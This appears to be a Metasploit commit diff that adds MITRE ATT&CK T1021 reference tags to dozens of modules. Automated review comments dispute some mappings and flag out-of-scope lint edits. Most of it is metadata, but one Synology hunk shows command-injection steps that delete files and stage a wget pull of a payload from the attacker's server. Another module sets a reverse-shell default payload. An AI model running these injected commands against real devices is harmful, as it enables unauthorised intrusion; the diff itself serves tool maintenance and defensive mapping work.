Add references to MITRE ATT&CK T1021 - Remote Services
@@ -31,6 +31,7 @@ class MetasploitModule < Msf::Auxiliary
|
||||
'j0hn__f'
|
||||
],
|
||||
'References' => [
|
||||
[ 'ATT&CK', Mitre::Attack::Technique::T1021_002_SMB_WINDOWS_ADMIN_SHARES ]
|
||||
],
|
||||
'License' => MSF_LICENSE,
|
||||
'Notes' => {
|
||||
|
||||
@@ -29,7 +29,10 @@ class MetasploitModule < Msf::Auxiliary
|
||||
'Stability' => [CRASH_SAFE],
|
||||
'SideEffects' => [],
|
||||
'Reliability' => []
|
||||
}
|
||||
},
|
||||
'References' => [
|
||||
[ 'ATT&CK', Mitre::Attack::Technique::T1021_002_SMB_WINDOWS_ADMIN_SHARES ]
|
||||
]
|
||||
)
|
||||
|
||||
register_options([
|
||||
|
||||
@@ -27,6 +27,7 @@ class MetasploitModule < Msf::Auxiliary
|
||||
'hdm'
|
||||
],
|
||||
'References' => [
|
||||
[ 'ATT&CK', Mitre::Attack::Technique::T1021_002_SMB_WINDOWS_ADMIN_SHARES ]
|
||||
],
|
||||
'License' => MSF_LICENSE,
|
||||
'Notes' => {
|
||||
|
||||
@@ -41,6 +41,7 @@ class MetasploitModule < Msf::Auxiliary
|
||||
[ 'URL', 'https://github.com/worawit/MS17-010' ],
|
||||
[ 'URL', 'https://hitcon.org/2017/CMT/slide-files/d2_s2_r0.pdf' ],
|
||||
[ 'URL', 'https://blogs.technet.microsoft.com/srd/2017/06/29/eternal-champion-exploit-analysis/' ],
|
||||
[ 'ATT&CK', Mitre::Attack::Technique::T1021_002_SMB_WINDOWS_ADMIN_SHARES ],
|
||||
],
|
||||
'DisclosureDate' => '2017-03-14',
|
||||
'Notes' => {
|
||||
|
||||
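Review bot: The added `[ 'ATT&CK', Mitre::Attack::Technique::T1021_002_SMB_WINDOWS_ADMIN_SHARES ],` line looks mis-mapped for this module. ATT&CK T1021 and its sub-techniques describe logging in to a remote service with valid accounts, whereas the neighbouring MS17-010 and EternalChampion URLs suggest a module that exercises an SMB vulnerability, which ATT&CK tracks as T1210 (Exploitation of Remote Services). The same question applies to other vulnerability-driven hunks in this commit: the CVE-2010-0926 Samba hunk (apparently a non-Windows target tagged as Windows Admin Shares), the CVE-2021-1675 hunk, the CVE-2019-0708 hunk (`T1021_001_REMOTE_DESKTOP_PROTOCOL`), and web-application hunks such as CVE-2024-21683 and CVE-2024-1709, where T1190 reads as the closer fit. Defenders use these tags to line module activity up with detection coverage, so I would keep T1021.x on the credential-based login modules (the CVE-1999-0502 and CVE-1999-0506 hunks) and point the rest at the project's T1210 or T1190 constants. The info hash begins and ends outside this hunk, so the module's purpose is inferred from the visible references only.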
@@ -29,7 +29,8 @@ class MetasploitModule < Msf::Auxiliary
|
||||
'References' => [
|
||||
['CVE', '2010-0926'],
|
||||
['OSVDB', '62145'],
|
||||
['URL', 'http://www.samba.org/samba/news/symlink_attack.html']
|
||||
['URL', 'http://www.samba.org/samba/news/symlink_attack.html'],
|
||||
['ATT&CK', Mitre::Attack::Technique::T1021_002_SMB_WINDOWS_ADMIN_SHARES]
|
||||
],
|
||||
'License' => MSF_LICENSE,
|
||||
'Notes' => {
|
||||
|
||||
@@ -26,6 +26,7 @@ class MetasploitModule < Msf::Auxiliary
|
||||
'hdm' # metasploit module
|
||||
],
|
||||
'References' => [
|
||||
[ 'ATT&CK', Mitre::Attack::Technique::T1021_002_SMB_WINDOWS_ADMIN_SHARES ]
|
||||
],
|
||||
'License' => MSF_LICENSE,
|
||||
'Notes' => {
|
||||
|
||||
@@ -30,7 +30,8 @@ class MetasploitModule < Msf::Auxiliary
|
||||
'License' => MSF_LICENSE,
|
||||
'References' => [
|
||||
['URL', 'https://webexec.org'],
|
||||
['CVE', '2018-15442']
|
||||
['CVE', '2018-15442'],
|
||||
['ATT&CK', Mitre::Attack::Technique::T1021_002_SMB_WINDOWS_ADMIN_SHARES]
|
||||
],
|
||||
'Notes' => {
|
||||
'Stability' => [CRASH_SAFE],
|
||||
|
||||
@@ -29,6 +29,7 @@ class MetasploitModule < Msf::Auxiliary
|
||||
['OSVDB', '25479'],
|
||||
['URL', 'https://web.archive.org/web/20080102163013/http://secunia.com/advisories/20107/'],
|
||||
['CVE', '2006-2369'],
|
||||
['ATT&CK', Mitre::Attack::Technique::T1021_005_VNC],
|
||||
],
|
||||
'DisclosureDate' => '2006-05-15',
|
||||
'Notes' => {
|
||||
|
||||
@@ -43,6 +43,7 @@ class MetasploitModule < Msf::Auxiliary
|
||||
],
|
||||
'References' => [
|
||||
[ 'CVE', '1999-0506'], # Weak password
|
||||
[ 'ATT&CK', Mitre::Attack::Technique::T1021_002_SMB_WINDOWS_ADMIN_SHARES ],
|
||||
],
|
||||
'License' => MSF_LICENSE,
|
||||
'DefaultOptions' => {
|
||||
|
||||
@@ -33,7 +33,8 @@ class MetasploitModule < Msf::Auxiliary
|
||||
['CVE', '2018-16158'],
|
||||
['EDB', '45283'],
|
||||
['URL', 'https://www.eaton.com/content/dam/eaton/company/news-insights/cybersecurity/security-bulletins/PXM-Advisory.pdf'],
|
||||
['URL', 'https://www.ctrlu.net/vuln/0006.html']
|
||||
['URL', 'https://www.ctrlu.net/vuln/0006.html'],
|
||||
['ATT&CK', Mitre::Attack::Technique::T1021_004_SSH]
|
||||
],
|
||||
'DisclosureDate' => '2018-07-18',
|
||||
'License' => MSF_LICENSE,
|
||||
|
||||
@@ -29,7 +29,8 @@ class MetasploitModule < Msf::Auxiliary
|
||||
['EDB', '39224'],
|
||||
['PACKETSTORM', '135225'],
|
||||
['URL', 'https://seclists.org/fulldisclosure/2016/Jan/26'],
|
||||
['URL', 'https://blog.fortinet.com/post/brief-statement-regarding-issues-found-with-fortios']
|
||||
['URL', 'https://blog.fortinet.com/post/brief-statement-regarding-issues-found-with-fortios'],
|
||||
['ATT&CK', Mitre::Attack::Technique::T1021_004_SSH]
|
||||
],
|
||||
'DisclosureDate' => '2016-01-09',
|
||||
'License' => MSF_LICENSE,
|
||||
|
||||
@@ -26,7 +26,8 @@ class MetasploitModule < Msf::Auxiliary
|
||||
'References' => [
|
||||
['CVE', '2015-7755'],
|
||||
['URL', 'https://www.rapid7.com/blog/post/2015/12/20/cve-2015-7755-juniper-screenos-authentication-backdoor/'],
|
||||
['URL', 'https://kb.juniper.net/InfoCenter/index?page=content&id=JSA10713']
|
||||
['URL', 'https://kb.juniper.net/InfoCenter/index?page=content&id=JSA10713'],
|
||||
['ATT&CK', Mitre::Attack::Technique::T1021_004_SSH]
|
||||
],
|
||||
'DisclosureDate' => '2015-12-20',
|
||||
'License' => MSF_LICENSE,
|
||||
|
||||
@@ -36,7 +36,8 @@ class MetasploitModule < Msf::Auxiliary
|
||||
],
|
||||
'References' => [
|
||||
['CVE', '2018-10933'],
|
||||
['URL', 'https://www.libssh.org/security/advisories/CVE-2018-10933.txt']
|
||||
['URL', 'https://www.libssh.org/security/advisories/CVE-2018-10933.txt'],
|
||||
['ATT&CK', Mitre::Attack::Technique::T1021_004_SSH]
|
||||
],
|
||||
'DisclosureDate' => '2018-10-16',
|
||||
'License' => MSF_LICENSE,
|
||||
|
||||
@@ -22,7 +22,10 @@ class MetasploitModule < Msf::Auxiliary
|
||||
'Author' => ['Wyatt Dahlenburg (@wdahlenb)'],
|
||||
'Platform' => ['linux'],
|
||||
'SessionTypes' => ['shell', 'meterpreter'],
|
||||
'References' => [['URL', 'https://docs.github.com/en/authentication/connecting-to-github-with-ssh/testing-your-ssh-connection']],
|
||||
'References' => [
|
||||
['URL', 'https://docs.github.com/en/authentication/connecting-to-github-with-ssh/testing-your-ssh-connection'],
|
||||
['ATT&CK', Mitre::Attack::Technique::T1021_004_SSH]
|
||||
],
|
||||
'Notes' => {
|
||||
'Reliability' => UNKNOWN_RELIABILITY,
|
||||
'Stability' => UNKNOWN_STABILITY,
|
||||
|
||||
@@ -28,7 +28,8 @@ class MetasploitModule < Msf::Auxiliary
|
||||
},
|
||||
'Author' => ['todb'],
|
||||
'References' => [
|
||||
[ 'CVE', '1999-0502'] # Weak password
|
||||
[ 'CVE', '1999-0502'], # Weak password
|
||||
[ 'ATT&CK', Mitre::Attack::Technique::T1021_004_SSH ]
|
||||
],
|
||||
'License' => MSF_LICENSE,
|
||||
'DefaultOptions' => { 'VERBOSE' => false } # Disable annoying connect errors
|
||||
|
||||
@@ -35,7 +35,10 @@ class MetasploitModule < Msf::Auxiliary
|
||||
be shared between subject keys or only belong to a single one.
|
||||
},
|
||||
'Author' => ['todb', 'RageLtMan'],
|
||||
'License' => MSF_LICENSE
|
||||
'License' => MSF_LICENSE,
|
||||
'References' => [
|
||||
[ 'ATT&CK', Mitre::Attack::Technique::T1021_004_SSH ]
|
||||
]
|
||||
)
|
||||
|
||||
register_options(
|
||||
|
||||
@@ -26,7 +26,8 @@ class MetasploitModule < Msf::Auxiliary
|
||||
},
|
||||
'Author' => 'egypt',
|
||||
'References' => [
|
||||
[ 'CVE', '1999-0502'] # Weak password
|
||||
[ 'CVE', '1999-0502'], # Weak password
|
||||
[ 'ATT&CK', Mitre::Attack::Technique::T1021_REMOTE_SERVICES ]
|
||||
],
|
||||
'License' => MSF_LICENSE
|
||||
)
|
||||
|
||||
@@ -21,7 +21,8 @@ class MetasploitModule < Msf::Auxiliary
|
||||
'References' => [
|
||||
[ 'CVE', '2012-1803' ],
|
||||
[ 'EDB', '18779' ],
|
||||
[ 'US-CERT-VU', '889195' ]
|
||||
[ 'US-CERT-VU', '889195' ],
|
||||
[ 'ATT&CK', Mitre::Attack::Technique::T1021_REMOTE_SERVICES ]
|
||||
],
|
||||
'Author' => [
|
||||
'Borja Merino <bmerinofe[at]gmail.com>',
|
||||
|
||||
@@ -14,7 +14,8 @@ class MetasploitModule < Msf::Auxiliary
|
||||
'Description' => 'Enable and set root account to a chosen password on unpatched macOS High Sierra hosts with either Screen Sharing or Remote Management enabled.',
|
||||
'References' => [
|
||||
['CVE', '2017-13872'],
|
||||
['URL', 'https://support.apple.com/en-us/HT208315']
|
||||
['URL', 'https://support.apple.com/en-us/HT208315'],
|
||||
['ATT&CK', Mitre::Attack::Technique::T1021_005_VNC]
|
||||
],
|
||||
'Author' => 'jgor',
|
||||
'License' => MSF_LICENSE
|
||||
|
||||
@@ -26,7 +26,8 @@ class MetasploitModule < Msf::Auxiliary
|
||||
'jduck'
|
||||
],
|
||||
'References' => [
|
||||
[ 'CVE', '1999-0506'] # Weak password
|
||||
[ 'CVE', '1999-0506'], # Weak password
|
||||
[ 'ATT&CK', Mitre::Attack::Technique::T1021_REMOTE_SERVICES ]
|
||||
],
|
||||
'License' => MSF_LICENSE
|
||||
)
|
||||
|
||||
@@ -17,7 +17,10 @@ class MetasploitModule < Msf::Auxiliary
|
||||
This module runs arbitrary Windows commands using the WinRM Service
|
||||
},
|
||||
'Author' => [ 'thelightcosine' ],
|
||||
'License' => MSF_LICENSE
|
||||
'License' => MSF_LICENSE,
|
||||
'References' => [
|
||||
[ 'ATT&CK', Mitre::Attack::Technique::T1021_006_WINDOWS_REMOTE_MANAGEMENT ]
|
||||
]
|
||||
)
|
||||
|
||||
register_options(
|
||||
|
||||
@@ -30,7 +30,8 @@ class MetasploitModule < Msf::Auxiliary
|
||||
},
|
||||
'Author' => [ 'thelightcosine', 'smashery' ],
|
||||
'References' => [
|
||||
[ 'CVE', '1999-0502'] # Weak password
|
||||
[ 'CVE', '1999-0502'], # Weak password
|
||||
[ 'ATT&CK', Mitre::Attack::Technique::T1021_006_WINDOWS_REMOTE_MANAGEMENT ]
|
||||
],
|
||||
'License' => MSF_LICENSE
|
||||
)
|
||||
|
||||
@@ -19,7 +19,10 @@ class MetasploitModule < Msf::Auxiliary
|
||||
winrm option must be set.
|
||||
},
|
||||
'Author' => [ 'thelightcosine' ],
|
||||
'License' => MSF_LICENSE
|
||||
'License' => MSF_LICENSE,
|
||||
'References' => [
|
||||
[ 'ATT&CK', Mitre::Attack::Technique::T1021_006_WINDOWS_REMOTE_MANAGEMENT ]
|
||||
]
|
||||
)
|
||||
|
||||
register_options(
|
||||
|
||||
@@ -26,7 +26,8 @@ class MetasploitModule < Msf::Exploit::Remote
|
||||
'hdm'
|
||||
],
|
||||
'References' => [
|
||||
['OSVDB', '61284']
|
||||
['OSVDB', '61284'],
|
||||
['ATT&CK', Mitre::Attack::Technique::T1021_004_SSH]
|
||||
],
|
||||
'DefaultOptions' => {
|
||||
'EXITFUNC' => 'thread'
|
||||
|
||||
@@ -42,7 +42,8 @@ class MetasploitModule < Msf::Exploit::Remote
|
||||
'References' => [
|
||||
['CVE', '2023-45249'],
|
||||
['URL', 'https://security-advisory.acronis.com/advisories/SEC-6452'],
|
||||
['URL', 'https://attackerkb.com/topics/T2b62daDsL/cve-2023-45249']
|
||||
['URL', 'https://attackerkb.com/topics/T2b62daDsL/cve-2023-45249'],
|
||||
['ATT&CK', Mitre::Attack::Technique::T1021_004_SSH]
|
||||
],
|
||||
'License' => MSF_LICENSE,
|
||||
'Platform' => ['unix', 'linux'],
|
||||
|
||||
@@ -33,7 +33,8 @@ class MetasploitModule < Msf::Exploit::Remote
|
||||
['URL', 'https://raw.githubusercontent.com/pedrib/PoC/master/advisories/asuswrt-lan-rce.txt'],
|
||||
['URL', 'https://seclists.org/fulldisclosure/2018/Jan/78'],
|
||||
['CVE', '2018-5999'],
|
||||
['CVE', '2018-6000']
|
||||
['CVE', '2018-6000'],
|
||||
['ATT&CK', Mitre::Attack::Technique::T1021_REMOTE_SERVICES]
|
||||
],
|
||||
'Targets' => [
|
||||
[
|
||||
|
||||
@@ -29,7 +29,8 @@ class MetasploitModule < Msf::Exploit::Remote
|
||||
['CVE', '2025-1094'], # The SQL injection in PostgreSQL code.
|
||||
['URL', 'http://web.archive.org/web/20241226144006/https://www.beyondtrust.com/trust-center/security-advisories/bt24-10'], # BeyondTrust Advisory
|
||||
['URL', 'https://www.postgresql.org/support/security/CVE-2025-1094/'], # PostgreSQL Advisory
|
||||
['URL', 'https://attackerkb.com/topics/G5s8ZWAbYH/cve-2024-12356/rapid7-analysis'] # Rapid7 Analysis
|
||||
['URL', 'https://attackerkb.com/topics/G5s8ZWAbYH/cve-2024-12356/rapid7-analysis'], # Rapid7 Analysis
|
||||
['ATT&CK', Mitre::Attack::Technique::T1021_REMOTE_SERVICES]
|
||||
],
|
||||
'DisclosureDate' => '2024-12-16',
|
||||
'Platform' => [ 'linux', 'unix' ],
|
||||
|
||||
@@ -24,7 +24,8 @@ class MetasploitModule < Msf::Exploit::Remote
|
||||
],
|
||||
'References' => [
|
||||
['CVE', '2014-2928'],
|
||||
['URL', 'http://support.f5.com/kb/en-us/solutions/public/15000/200/sol15220.html']
|
||||
['URL', 'http://support.f5.com/kb/en-us/solutions/public/15000/200/sol15220.html'],
|
||||
['ATT&CK', Mitre::Attack::Technique::T1021_REMOTE_SERVICES]
|
||||
],
|
||||
'Platform' => ['unix'],
|
||||
'Arch' => ARCH_CMD,
|
||||
|
||||
@@ -53,7 +53,8 @@ class MetasploitModule < Msf::Exploit::Remote
|
||||
],
|
||||
'References' => [
|
||||
['CVE', '2019-15949'],
|
||||
['URL', 'https://github.com/jakgibb/nagiosxi-root-rce-exploit'] # original PHP exploit
|
||||
['URL', 'https://github.com/jakgibb/nagiosxi-root-rce-exploit'], # original PHP exploit
|
||||
['ATT&CK', Mitre::Attack::Technique::T1021_REMOTE_SERVICES]
|
||||
],
|
||||
'Payload' => { 'BadChars' => "\x00" },
|
||||
'Targets' => [
|
||||
@@ -77,7 +78,9 @@ class MetasploitModule < Msf::Exploit::Remote
|
||||
'Platform' => 'unix',
|
||||
'DefaultOptions' => { 'PAYLOAD' => 'cmd/unix/reverse_bash' },
|
||||
'Payload' => {
|
||||
# rubocop:disable Lint/DetectMetadataTrailingLeadingWhitespace
|
||||
'Append' => ' & disown', # the payload must be disowned after execution, otherwise cleanup fails
|
||||
# rubocop:enable Lint/DetectMetadataTrailingLeadingWhitespace
|
||||
'BadChars' => '"'
|
||||
}
|
||||
}
|
||||
|
||||
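Review bot: The `# rubocop:disable Lint/DetectMetadataTrailingLeadingWhitespace` and matching `# rubocop:enable` comments around `'Append' => ' & disown'` in this file's second hunk appear to be lint housekeeping that the commit title (ATT&CK T1021 references) does not cover. The same goes for the `cmd = ` removals in the `@@ -179,20 +180,20 @@` hunk further down, e.g. `inject_request(cookie, token, 'rm -rf /a')`. Both look behaviour-preserving from the visible lines, but the `cmd` removals are only safe if `cmd` is not read later in that method, which continues outside the hunk. I would split these into their own commit or add a line to the description such as `Also resolves rubocop findings in the touched modules.`, so that a reviewer auditing the metadata change is not surprised by edits to request-building code.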
@@ -29,7 +29,8 @@ class MetasploitModule < Msf::Exploit::Remote
|
||||
['URL', 'https://github.com/Supervisor/supervisor/issues/964'],
|
||||
['URL', 'https://www.debian.org/security/2017/dsa-3942'],
|
||||
['URL', 'https://github.com/phith0n/vulhub/tree/master/supervisor/CVE-2017-11610'],
|
||||
['CVE', '2017-11610']
|
||||
['CVE', '2017-11610'],
|
||||
['ATT&CK', Mitre::Attack::Technique::T1021_REMOTE_SERVICES]
|
||||
],
|
||||
'Platform' => 'linux',
|
||||
'Targets' => [
|
||||
|
||||
@@ -39,7 +39,8 @@ class MetasploitModule < Msf::Exploit::Remote
|
||||
[ 'CVE', '2017-15889' ],
|
||||
[ 'EDB', '43190' ],
|
||||
[ 'URL', 'https://ssd-disclosure.com/ssd-advisory-synology-storagemanager-smart-cgi-remote-command-execution/' ],
|
||||
[ 'URL', 'https://synology.com/en-global/security/advisory/Synology_SA_17_65_DSM' ]
|
||||
[ 'URL', 'https://synology.com/en-global/security/advisory/Synology_SA_17_65_DSM' ],
|
||||
[ 'ATT&CK', Mitre::Attack::Technique::T1021_REMOTE_SERVICES ]
|
||||
],
|
||||
'Privileged' => true,
|
||||
'Stance' => Msf::Exploit::Stance::Aggressive,
|
||||
@@ -179,20 +180,20 @@ class MetasploitModule < Msf::Exploit::Remote
|
||||
})
|
||||
|
||||
print_status('Cleaning env')
|
||||
inject_request(cookie, token, cmd = 'rm -rf /a')
|
||||
inject_request(cookie, token, cmd = 'rm -rf b')
|
||||
inject_request(cookie, token, 'rm -rf /a')
|
||||
inject_request(cookie, token, 'rm -rf b')
|
||||
command = "#{datastore['SRVHOST']}:#{datastore['SRVPORT']}".split(//)
|
||||
command_space = 22 - "echo -n ''>>/a".length
|
||||
command_space -= 1
|
||||
command.each_slice(command_space) do |a|
|
||||
a = a.join('')
|
||||
vprint_status("Staging wget with: echo -n '#{a}'>>/a")
|
||||
inject_request(cookie, token, cmd = "echo -n '#{a}'>>/a")
|
||||
inject_request(cookie, token, "echo -n '#{a}'>>/a")
|
||||
end
|
||||
print_status('Requesting payload pull')
|
||||
register_file_for_cleanup('/usr/syno/synoman/webman/modules/StorageManager/b')
|
||||
register_file_for_cleanup('/a')
|
||||
inject_request(cookie, token, cmd = 'wget -i /a -O b')
|
||||
inject_request(cookie, token, 'wget -i /a -O b')
|
||||
# at this point we let the HTTP server call the last stage
|
||||
# wfsdelay should be long enough to hold out for everything to download and run
|
||||
rescue ::Rex::ConnectionError
|
||||
|
||||
@@ -36,7 +36,8 @@ class MetasploitModule < Msf::Exploit::Remote
|
||||
},
|
||||
'DefaultOptions' => { 'PAYLOAD' => 'cmd/unix/interact' },
|
||||
'References' => [
|
||||
[ 'CVE', '2013-2578']
|
||||
[ 'CVE', '2013-2578'],
|
||||
[ 'ATT&CK', Mitre::Attack::Technique::T1021_REMOTE_SERVICES ]
|
||||
],
|
||||
'Targets' => [
|
||||
[ 'Automatic', {} ],
|
||||
|
||||
@@ -31,7 +31,8 @@ class MetasploitModule < Msf::Exploit::Remote
|
||||
'References' => [
|
||||
['CVE', '2025-24016'],
|
||||
['URL', 'https://github.com/wazuh/wazuh/security/advisories/GHSA-hcrc-79hj-m3qh'],
|
||||
['URL', 'https://attackerkb.com/topics/piW0q4r5Uy/cve-2025-24016']
|
||||
['URL', 'https://attackerkb.com/topics/piW0q4r5Uy/cve-2025-24016'],
|
||||
['ATT&CK', Mitre::Attack::Technique::T1021_REMOTE_SERVICES]
|
||||
],
|
||||
'License' => MSF_LICENSE,
|
||||
'Platform' => ['unix', 'linux'],
|
||||
|
||||
@@ -35,7 +35,8 @@ class MetasploitModule < Msf::Exploit::Remote
|
||||
'References' => [
|
||||
[ 'CVE', '2025-34082' ],
|
||||
[ 'URL', 'https://kb.igel.com/securitysafety/en/isn-2021-01-igel-os-remote-command-execution-vulnerability-41449239.html' ],
|
||||
[ 'URL', 'https://www.igel.com/wp-content/uploads/2021/02/lxos_11.04.270.txt' ]
|
||||
[ 'URL', 'https://www.igel.com/wp-content/uploads/2021/02/lxos_11.04.270.txt' ],
|
||||
[ 'ATT&CK', Mitre::Attack::Technique::T1021_005_VNC ]
|
||||
],
|
||||
'Platform' => ['linux'],
|
||||
'Arch' => [ARCH_X86, ARCH_X64],
|
||||
|
||||
@@ -42,6 +42,7 @@ class MetasploitModule < Msf::Exploit::Remote
|
||||
'References' => [
|
||||
['CVE', '2015-0936'],
|
||||
['URL', 'https://gist.github.com/todb-r7/5d86ecc8118f9eeecc15'], # Original Disclosure
|
||||
['ATT&CK', Mitre::Attack::Technique::T1021_004_SSH],
|
||||
],
|
||||
'DisclosureDate' => '2015-04-01', # Not a joke
|
||||
'DefaultOptions' => { 'PAYLOAD' => 'cmd/unix/interact' },
|
||||
|
||||
@@ -40,7 +40,8 @@ class MetasploitModule < Msf::Exploit::Remote
|
||||
'References' => [
|
||||
[ 'CVE', '2016-1560' ], # password
|
||||
[ 'CVE', '2016-1561' ], # private key
|
||||
[ 'URL', 'https://www.rapid7.com/blog/post/2016/04/07/r7-2016-04-exagrid-backdoor-ssh-keys-and-hardcoded-credentials' ]
|
||||
[ 'URL', 'https://www.rapid7.com/blog/post/2016/04/07/r7-2016-04-exagrid-backdoor-ssh-keys-and-hardcoded-credentials' ],
|
||||
[ 'ATT&CK', Mitre::Attack::Technique::T1021_004_SSH ]
|
||||
],
|
||||
'DisclosureDate' => '2016-04-07',
|
||||
'DefaultOptions' => { 'PAYLOAD' => 'cmd/unix/interact' },
|
||||
|
||||
@@ -40,7 +40,8 @@ class MetasploitModule < Msf::Exploit::Remote
|
||||
[ 'URL', 'https://www.trustmatta.com/advisories/MATTA-2012-002.txt' ],
|
||||
[ 'CVE', '2012-1493' ],
|
||||
[ 'OSVDB', '82780' ],
|
||||
[ 'URL', 'https://www.rapid7.com/blog/post/2012/06/25/press-f5-for-root-shell' ]
|
||||
[ 'URL', 'https://www.rapid7.com/blog/post/2012/06/25/press-f5-for-root-shell' ],
|
||||
[ 'ATT&CK', Mitre::Attack::Technique::T1021_004_SSH ]
|
||||
],
|
||||
'DisclosureDate' => '2012-06-11',
|
||||
'DefaultOptions' => { 'PAYLOAD' => 'cmd/unix/interact' },
|
||||
|
||||
@@ -28,7 +28,8 @@ class MetasploitModule < Msf::Exploit::Remote
|
||||
[ 'CVE', '2020-4429' ], # insecure default password
|
||||
[ 'URL', 'https://github.com/pedrib/PoC/blob/master/advisories/IBM/ibm_drm/ibm_drm_rce.md' ],
|
||||
[ 'URL', 'https://seclists.org/fulldisclosure/2020/Apr/33' ],
|
||||
[ 'URL', 'https://www.ibm.com/blogs/psirt/security-bulletin-vulnerabilities-exist-in-ibm-data-risk-manager-cve-2020-4427-cve-2020-4428-cve-2020-4429-and-cve-2020-4430/']
|
||||
[ 'URL', 'https://www.ibm.com/blogs/psirt/security-bulletin-vulnerabilities-exist-in-ibm-data-risk-manager-cve-2020-4427-cve-2020-4428-cve-2020-4429-and-cve-2020-4430/'],
|
||||
[ 'ATT&CK', Mitre::Attack::Technique::T1021_004_SSH ]
|
||||
],
|
||||
'Payload' => {
|
||||
'Compat' => {
|
||||
|
||||
@@ -37,7 +37,8 @@ class MetasploitModule < Msf::Exploit::Remote
|
||||
'Author' => 'xistence <xistence[at]0x90.nl>', # Discovery, Metasploit module
|
||||
'License' => MSF_LICENSE,
|
||||
'References' => [
|
||||
['PACKETSTORM', '125754']
|
||||
['PACKETSTORM', '125754'],
|
||||
['ATT&CK', Mitre::Attack::Technique::T1021_004_SSH]
|
||||
],
|
||||
'DisclosureDate' => '2014-03-17',
|
||||
'DefaultOptions' => { 'PAYLOAD' => 'cmd/unix/interact' },
|
||||
|
||||
@@ -24,7 +24,8 @@ class MetasploitModule < Msf::Exploit::Remote
|
||||
],
|
||||
'References' => [
|
||||
[ 'CVE', '2017-9462' ],
|
||||
['URL', 'https://www.mercurial-scm.org/wiki/WhatsNew#Mercurial_4.1.3_.282017-4-18.29']
|
||||
[ 'URL', 'https://www.mercurial-scm.org/wiki/WhatsNew#Mercurial_4.1.3_.282017-4-18.29' ],
|
||||
[ 'ATT&CK', Mitre::Attack::Technique::T1021_004_SSH ]
|
||||
],
|
||||
'DefaultOptions' => {
|
||||
'Payload' => 'python/meterpreter/reverse_tcp'
|
||||
|
||||
@@ -36,7 +36,8 @@ class MetasploitModule < Msf::Exploit::Remote
|
||||
'Author' => 'xistence <xistence[at]0x90.nl>', # Discovery, Metasploit module
|
||||
'License' => MSF_LICENSE,
|
||||
'References' => [
|
||||
['PACKETSTORM', '125755']
|
||||
['PACKETSTORM', '125755'],
|
||||
['ATT&CK', Mitre::Attack::Technique::T1021_004_SSH]
|
||||
],
|
||||
'DisclosureDate' => '2014-03-17',
|
||||
'DefaultOptions' => { 'PAYLOAD' => 'cmd/unix/interact' },
|
||||
|
||||
@@ -26,7 +26,8 @@ class MetasploitModule < Msf::Exploit::Remote
|
||||
],
|
||||
'References' => [
|
||||
['CVE', '2017-7722'],
|
||||
['URL', 'http://web.archive.org/web/20250221015511/https://pentest.blog/unexpected-journey-4-escaping-from-restricted-shell-and-gaining-root-access-to-solarwinds-log-event-manager-siem-product/']
|
||||
['URL', 'http://web.archive.org/web/20250221015511/https://pentest.blog/unexpected-journey-4-escaping-from-restricted-shell-and-gaining-root-access-to-solarwinds-log-event-manager-siem-product/'],
|
||||
['ATT&CK', Mitre::Attack::Technique::T1021_004_SSH]
|
||||
],
|
||||
'DefaultOptions' => {
|
||||
'Payload' => 'python/meterpreter/reverse_tcp'
|
||||
|
||||
@@ -37,7 +37,8 @@ class MetasploitModule < Msf::Exploit::Remote
|
||||
['CVE', '2025-32433'],
|
||||
['URL', 'https://x.com/Horizon3Attack/status/1912945580902334793'],
|
||||
['URL', 'https://platformsecurity.com/blog/CVE-2025-32433-poc'],
|
||||
['URL', 'https://github.com/ProDefense/CVE-2025-32433']
|
||||
['URL', 'https://github.com/ProDefense/CVE-2025-32433'],
|
||||
['ATT&CK', Mitre::Attack::Technique::T1021_004_SSH]
|
||||
],
|
||||
'Platform' => ['linux', 'unix'],
|
||||
'Arch' => [ARCH_CMD],
|
||||
|
||||
@@ -31,7 +31,8 @@ class MetasploitModule < Msf::Exploit::Remote
|
||||
['CVE', '2012-3579'],
|
||||
['OSVDB', '85028'],
|
||||
['BID', '55143'],
|
||||
['URL', 'http://www.symantec.com/security_response/securityupdates/detail.jsp?fid=security_advisory&pvid=security_advisory&suid=20120827_00']
|
||||
['URL', 'http://www.symantec.com/security_response/securityupdates/detail.jsp?fid=security_advisory&pvid=security_advisory&suid=20120827_00'],
|
||||
['ATT&CK', Mitre::Attack::Technique::T1021_004_SSH]
|
||||
],
|
||||
'DefaultOptions' => {
|
||||
'EXITFUNC' => 'thread'
|
||||
|
||||
@@ -36,6 +36,7 @@ class MetasploitModule < Msf::Exploit::Remote
|
||||
'References' => [
|
||||
[ 'CVE', '2016-7456' ],
|
||||
[ 'URL', 'https://www.vmware.com/security/advisories/VMSA-2016-0024.html' ],
|
||||
[ 'ATT&CK', Mitre::Attack::Technique::T1021_004_SSH ],
|
||||
],
|
||||
'DisclosureDate' => '2016-12-20',
|
||||
'DefaultOptions' => { 'PAYLOAD' => 'cmd/unix/interact' },
|
||||
|
||||
@@ -71,6 +71,7 @@ class MetasploitModule < Msf::Exploit::Remote
|
||||
['URL', 'https://github.com/sinsinology/CVE-2023-34039'],
|
||||
['URL', 'https://summoning.team/blog/vmware-vrealize-network-insight-rce-cve-2023-34039/'],
|
||||
['URL', 'https://www.vmware.com/security/advisories/VMSA-2023-0018.html'],
|
||||
['ATT&CK', Mitre::Attack::Technique::T1021_004_SSH],
|
||||
],
|
||||
'DisclosureDate' => '2023-08-29',
|
||||
'DefaultOptions' => { 'PAYLOAD' => 'cmd/unix/interact' },
|
||||
|
||||
@@ -28,7 +28,8 @@ class MetasploitModule < Msf::Exploit::Remote
|
||||
'References' => [
|
||||
['URL', 'https://wiki.openwrt.org/toh/netgear/telnet.console'],
|
||||
['URL', 'https://github.com/cyanitol/netgear-telenetenable'],
|
||||
['URL', 'https://github.com/insanid/netgear-telenetenable']
|
||||
['URL', 'https://github.com/insanid/netgear-telenetenable'],
|
||||
['ATT&CK', Mitre::Attack::Technique::T1021_REMOTE_SERVICES]
|
||||
],
|
||||
'DisclosureDate' => '2009-10-30', # Python PoC (TCP)
|
||||
'License' => MSF_LICENSE,
|
||||
|
||||
@@ -34,7 +34,8 @@ class MetasploitModule < Msf::Exploit::Remote
|
||||
['CVE', '2024-21683'],
|
||||
['URL', 'https://jira.atlassian.com/browse/CONFSERVER-95832'],
|
||||
['URL', 'https://realalphaman.substack.com/p/quick-note-about-cve-2024-21683-authenticated'],
|
||||
['URL', 'https://github.com/W01fh4cker/CVE-2024-21683-RCE']
|
||||
['URL', 'https://github.com/W01fh4cker/CVE-2024-21683-RCE'],
|
||||
['ATT&CK', Mitre::Attack::Technique::T1021_REMOTE_SERVICES]
|
||||
],
|
||||
'DisclosureDate' => '2024-05-21',
|
||||
